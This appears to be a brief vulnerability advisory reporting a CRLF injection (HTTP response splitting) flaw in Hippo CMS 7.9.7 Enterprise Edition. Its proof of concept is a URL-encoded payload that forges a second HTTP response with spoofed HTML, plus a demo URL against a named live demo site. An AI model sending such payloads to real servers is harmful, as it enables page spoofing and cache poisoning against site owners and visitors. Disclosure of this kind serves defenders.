# Affected software: hippo cms 
# Type of vulnerability:crlf
# URL:https://cms.demo.onehippo.com
# Discovered by: provensec
# Website: provensec.com

#version: CMS 7.9.7 Enterprise Edition 
# Proof of concept

payload : 
advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20ding
dong</html>

demo: 
https://cms.demo.onehippo.com/?0&advanced%0D%0AContent-Length:+0%0D%0A%0D%0AHTTP/1.1+200+OK%0D%0AContent-Type:+text/html%0D%0AContent-Length:+35%0D%0A%0D%0A%3Chtml%3ESorry,+System+Down%3C/html%3E


screenshot:http://prntscr.com/6rxb6l